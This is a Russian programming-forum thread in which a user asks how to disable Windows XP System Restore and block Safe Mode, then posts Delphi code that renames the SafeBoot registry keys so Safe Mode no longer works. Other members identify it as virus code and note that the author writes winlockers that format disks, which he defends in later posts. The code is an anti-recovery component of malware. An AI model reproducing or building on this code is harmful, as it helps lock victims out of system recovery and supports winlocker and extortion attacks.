Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Низкоуровневое программирование > Win Api
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 08.08.2012, 14:11   #1
drmorgan
Новичок
Джуниор
 
Регистрация: 07.08.2012
Сообщений: 17
По умолчанию Убрать все точки восстановления системы?

Приветствую уважаемые. У меня такой вопрос .Кто нибудь знает код, для того чтобы отключить восстановление системы, или убрать все точки восстановления, для Windows XP.Я пробовал манипуляции с реестром, в ветке HKEY_LOCAL_MACHINE\SOFTWARE\Policie s\Microsoft\Windows NT,с созданием нового вложенного ключа SystemRestore и DisableConfig типа REG_DWORD со значением 0, но уже под sp 2 не прокатывает.А вот всем известный авир Dr.Web при установке, каким то образом блокирует все точки отката до его установки,интересно было бы узнать как реализовать то же самое на делфи,весь мозг уже себе вынес
drmorgan вне форума Ответить с цитированием
Старый 08.08.2012, 17:55   #2
astecenko
Homo Interneticus
Форумчанин
 
Аватар для astecenko
 
Регистрация: 04.03.2011
Сообщений: 611
По умолчанию

В интырнетах ещё не смотрел, но сразу пришел такой вариант решения, как взять какой-нибудь ProcMon от Марка Руссиновича или какой-нибудь RegShot и посмотреть что делает во время установки в реестре тот же DrWeb.

Upd
Вот тут посмотрите правильный ключ в реестре для управления точками восстановления.

Последний раз редактировалось astecenko; 08.08.2012 в 18:00.
astecenko вне форума Ответить с цитированием
Старый 08.08.2012, 18:02   #3
drmorgan
Новичок
Джуниор
 
Регистрация: 07.08.2012
Сообщений: 17
По умолчанию

Цитата:
Сообщение от astecenko Посмотреть сообщение
В интырнетах ещё не смотрел, но сразу пришел такой вариант решения, как взять какой-нибудь ProcMon от Марка Руссиновича или какой-нибудь RegShot и посмотреть что делает во время установки в реестре тот же DrWeb.
В принципе , что я щяс и делаю, только не с Dr.Web,а просто путём стандартного виндовского отключения восстановления системы, если не получиться , тогда буду Dr.web мониторить. Просто думал может у людей уже есть готовый код на делфи по этой теме
drmorgan вне форума Ответить с цитированием
Старый 09.08.2012, 01:25   #4
drmorgan
Новичок
Джуниор
 
Регистрация: 07.08.2012
Сообщений: 17
По умолчанию

Проблема решена, код отключения восстановления системы написал, оттестил, всё работает из под моей проги, вот только заблокировать безопасный режим так и не хватило мозгов , этот код уже не катит(((

uses Registry;
...
var reg: TRegistry;
...
procedure BezopasOff;
begin
reg:= TRegistry.Create;
reg.RootKey := HKEY_LOCAL_MACHINE;
reg.MoveKey('System\CurrentControlS et\Control\SafeBoot\minimal','Syste m\CurrentControlSet\Control\SafeBoo t\M',true);
reg.MoveKey('System\CurrentControlS et\Control\SafeBoot\NetWork','Syste m\CurrentControlSet\Control\SafeBoo t\N',true);
reg.free;
end.

Последний раз редактировалось drmorgan; 09.08.2012 в 19:16.
drmorgan вне форума Ответить с цитированием
Старый 09.08.2012, 15:55   #5
Noor
Участник клуба
 
Аватар для Noor
 
Регистрация: 01.11.2006
Сообщений: 1,082
По умолчанию

Вирус detect (ИМХО)
Noor вне форума Ответить с цитированием
Старый 09.08.2012, 23:32   #6
Serge_Bliznykov
Старожил
 
Регистрация: 09.01.2008
Сообщений: 26,238
По умолчанию

Цитата:
Вирус detect (ИМХО)
да без всяких - "имхо".

Автор поста (в другой теме) напрямую радостно сообщает, что пишет троянов/локеров, скрытно форматирующих диски!
Serge_Bliznykov вне форума Ответить с цитированием
Старый 10.08.2012, 00:03   #7
drmorgan
Новичок
Джуниор
 
Регистрация: 07.08.2012
Сообщений: 17
По умолчанию

Цитата:
Сообщение от Serge_Bliznykov Посмотреть сообщение
да без всяких - "имхо".

Автор поста (в другой теме) напрямую радостно сообщает, что пишет троянов/локеров, скрытно форматирующих диски!
Н да господа, что то я ошибся дверью, тут все такие правильные и пушистые, никто никогда не пользовался пиратским софтом и креками?, да, ,да я больше чем уверен , у половины форума сейчас на машинах стоит пиратский софт, и добрая половина , пользовалась когда нибудь троями разного рода, чтобы взломать ,например тот же софт, отследить и т.д.,скучно с вами.
А это ответ для Человек_Борща из темы "Формат диска d" которую прикрыли, не успел ответить.
Цитата:"Что-то ваше исскуство храмает, раз уж вы не можете найти решение проблемы с 1-го поста или найти альтернативное, не стандартное, решеение, коих я придумал уже больше 3, не считая 4 стандартных подходов к проблеме "запороть ФС"".
Решение, я давно нашёл и протестил, решение это довольно не стандартное,с которым весьма трудно бороться,прога работает на ура, всё гениальное просто))).
Цитата:"Вы что курите?
Путать реверс инженерию и прикладное программирование..."
Я предпочитаю "афганку", а вы сер .И не чего я не путаю,дизассемблирование или реверсинг, или реверс инженерия, это как вам угодно, это тоже искусство, почитай Криса Касперски и Еву Рокко,только не путать с тем касперским , который антивирус написал,к стати абсолютно бездарный авир, сильно грузит систему, полно дыр и метёт всё подряд, как хреновый дворник, сколько систем из за него полегло))).
Что то тут лицимерием попахивает, похоже на официальный сайт Microsoft и борьбу с пиратством.Вообще то я задал конкретный вопрос, я так мыслю надо конкретно ответить , а если не знаешь или игнорируешь, то просто промолчать.

Последний раз редактировалось drmorgan; 10.08.2012 в 00:15.
drmorgan вне форума Ответить с цитированием
Старый 10.08.2012, 00:13   #8
Пепел Феникса
Старожил
 
Аватар для Пепел Феникса
 
Регистрация: 28.01.2009
Сообщений: 21,000
По умолчанию

Цитата:
тут все такие правильные и пушистые, никто никогда не пользовался пиратским софтом и креками?
опять путаете понятия?

между крякингом и порчей информации, вымогательством(винлокеры частые) и тп огромная разница.
Хорошо поставленный вопрос это уже половина ответа. | Каков вопрос, таков ответ.
Программа делает то что написал программист, а не то что он хотел.
Функции/утилиты ждут в параметрах то что им надо, а не то что вы хотите.
Пепел Феникса вне форума Ответить с цитированием
Старый 10.08.2012, 00:18   #9
drmorgan
Новичок
Джуниор
 
Регистрация: 07.08.2012
Сообщений: 17
По умолчанию

Цитата:
Сообщение от Пепел Феникса Посмотреть сообщение
опять путаете понятия?

между крякингом и порчей информации, вымогательством(винлокеры частые) и тп огромная разница.
Мои винлоки не вымогают,они абсолютные альтруисты и креки с винлоками я совсем не путаю, раз уж тут все такие правильные и за правопорядок, то крекинг это тоже наказуемое деяние, и я больше чем уверен, подними я у вас на форуме тему про крекинг, тока без воды, а с реальными , рабочими примерами и креками, её бы тоже забанили.

Последний раз редактировалось drmorgan; 10.08.2012 в 00:22.
drmorgan вне форума Ответить с цитированием
Старый 10.08.2012, 00:37   #10
drmorgan
Новичок
Джуниор
 
Регистрация: 07.08.2012
Сообщений: 17
По умолчанию

Цитата:
Сообщение от Serge_Bliznykov Посмотреть сообщение
да без всяких - "имхо".

Автор поста (в другой теме) напрямую радостно сообщает, что пишет троянов/локеров, скрытно форматирующих диски!
И не чего я не "радостно" сообщяю, а просто отстаивал свою точку зрения.
drmorgan вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
куда делся вирус после восстановления системы? alex(21) Безопасность, Шифрование 4 28.04.2012 01:35
Убрать точки без потери данных king13 Microsoft Office Excel 4 07.10.2009 13:54
как записывать в файл тип риал чтоб после точки эти нули убрать?? ТРОЯН=) Помощь студентам 3 24.04.2009 14:09
Убрать запятые и точки 3акup Microsoft Office Excel 7 18.02.2009 18:47